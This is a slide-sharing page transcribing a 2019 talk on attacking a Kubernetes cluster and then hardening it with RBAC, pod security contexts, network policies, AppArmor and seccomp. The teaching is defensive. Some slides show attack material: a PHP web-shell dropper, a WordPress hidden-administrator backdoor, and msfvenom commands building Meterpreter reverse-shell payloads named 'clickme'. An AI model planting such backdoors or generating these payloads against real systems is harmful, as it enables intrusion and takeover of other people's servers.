Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Attacking a K8s cluster and how defending it

Johann du Toit
October 31, 2019
Technology
0
58

Attacking a K8s cluster and how defending it

Will show how to attack a Kubernetes cluster followed promptly by how to secure your cluster.

Johann du Toit

October 31, 2019
Tweet

More Decks by Johann du Toit

See All by Johann du Toit
RESPECTING THE MICROSERVICE.
johanndutoit
1
56
Why so serious? Using GCP for realtime video context analyzation
johanndutoit
0
74
Progressive Web Apps in 15 Minutes
johanndutoit
0
37
The Machine Learning Intervention
johanndutoit
0
63
Progressive Web Apps
johanndutoit
0
91
Progressive Web Apps
johanndutoit
0
94
Launchpad Start Day 2 - Google Design Sprints
johanndutoit
2
110
Google Design Sprints
johanndutoit
0
81
Cloud Messaging
johanndutoit
0
170

Other Decks in Technology

See All in Technology
怖くない!ゼロから始めるPHPソースコードコンパイル入門
colopl
0
230
Qiita埋め込み用スライド
naoki_0531
0
5.5k
サイバー攻撃を想定したセキュリティガイドライン 策定とASM及びCNAPPの活用方法
syoshie
3
1.7k
プロダクト組織で取り組むアドベントカレンダー/Advent Calendar in Product Teams
mixplace
0
640
事業貢献を考えるための技術改善の目標設計と改善実績 / Targeted design of technical improvements to consider business contribution and improvement performance
oomatomo
0
250
ヤプリQA課題の見える化
gu3
0
140
[トレノケ雲の会 mod.13] 3回目のre:Inventで気づいたこと -CloudOperationsを添えて-
shintaro_fukatsu
0
120
深層学習と3Dキャプチャ・3Dモデル生成(土木学会応用力学委員会 応用数理・AIセミナー)
pfn
PRO
0
350
OPENLOGI Company Profile
hr01
0
57k
普通のエンジニアがLaravelコアチームメンバーになるまで
avosalmon
0
660
12 Days of OpenAIから読み解く、生成AI 2025年のトレンド
shunsukeono_am
0
980
サーバーなしでWordPress運用、できますよ。
sogaoh
PRO
0
170

Featured

See All Featured
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
507
140k
Why Our Code Smells
bkeepers
PRO
335
57k
Keith and Marios Guide to Fast Websites
keithpitt
410
22k
4 Signs Your Business is Dying
shpigford
182
21k
Building Your Own Lightsaber
phodgson
104
6.1k
Testing 201, or: Great Expectations
jmmastey
41
7.2k
The Power of CSS Pseudo Elements
geoffreycrofte
74
5.4k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
356
29k
Fireside Chat
paigeccino
34
3.1k
Statistics for Hackers
jakevdp
796
220k
GitHub's CSS Performance
jonrohan
1030
460k
The Art of Programming - Codeland 2020
erikaheidi
53
13k

Transcript

  1. Bust a Kube: Let’s attack a Kubernetes cluster and secure

    it along the way
  2. None
  3. None
  4. None
  5. None
  6. None
  7. None

  8. WHAT ATTACKING DEFENDING

  9. None

  10. WHAT ATTACKING OMG HELP

  11. None
  12. None
  13. None

  14. PODS NODES SERVICES NAMESPACES

  15. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume

  16. Node Kubelet Container Runtime: Docker Kube-proxy Kubelet C ontainer Runtim

    e pod #1 pod #2 pod #3

  17. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic

  18. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic app=hello tier=web app=hello tier=web

  19. Namespaces Logical grouping of resources and the first hint of

    multi-tenancy 10.10.10.2 10.10.10.2 10.10.10.2 10.10.10.2 Marketing Finance
  20. None

  21. > kubectl apply -f app.yaml

  22. None

  23. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  24. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume Attacks Tend to Start from a POD
  25. None
  26. None

  27. <?php add_action('wp_head', 'WordPress_bscript'); function WordPress_bscript() { file_put_contents( "exec.php", ‘<?php echo

    shell_exec($_REQUEST[“c”]);’ ); } ?>
  28. None
  29. None

  30. <?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')

    { require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('admin', ‘admin'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>

  31. “Head over to your site and try the function. It’s

    fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
  32. None
  33. None
  34. None
  35. None
  36. None
  37. None
  38. None

  39. Kali Linux

  40. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f sh \ -o clickme.sh

  41. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f elf \ -o clickme

  42. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f exe \ -o clickme.exe

  43. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f macho \ -o clickme.macho
  44. None
  45. None
  46. None
  47. None

  48. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  49. CONTROL PLANE NETWORKING HOST RUNTIME

  50. CONTROL PLANE NETWORKING HOST RUNTIME

  51. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

  52. None
  53. None
  54. None
  55. None
  56. None
  57. None

  58. UPGRADE!

  59. None

  60. Role Based Access Control

  61. “RBAC”

  62. None

  63. Role: MarketingAdmin Role: Developer

  64. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer

  65. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer RoleBinding

  66. CONTROL PLANE NETWORKING HOST RUNTIME

  67. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 Step 1: Run as Non Root

  68. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true Step 2: Read Only Filesystem

  69. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true allowPrivilegeEscalation: false Step 3: Prevent Escaping

  70. CONTROL PLANE NETWORKING HOST RUNTIME

  71. apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-db-access spec: podSelector: matchLabels:

    tier: database ingress: - from: - podSelector: matchLabels: frontend policyTypes: - Ingress Network Policy
  72. None
  73. None
  74. None

  75. CONTROL PLANE NETWORKING HOST RUNTIME

  76. None
  77. None

  78. Minimal Host OS

  79. None

  80. AppArmor

  81. seccomp

  82. Questions?

  83. • CIS Benchmark - CIS Security • Kube-bench - Aqua

    Security • Kube Auto Analyzer - Rory McCune • KubeAudit - Shopify • Sonobuoy - VMWare / Heptio • KubeATF - Symantec

  84. Security is a not a noun you refer to every

    now and then, it’s a verb and involves constant and specific action

  85. Thanks! [email protected] @signedness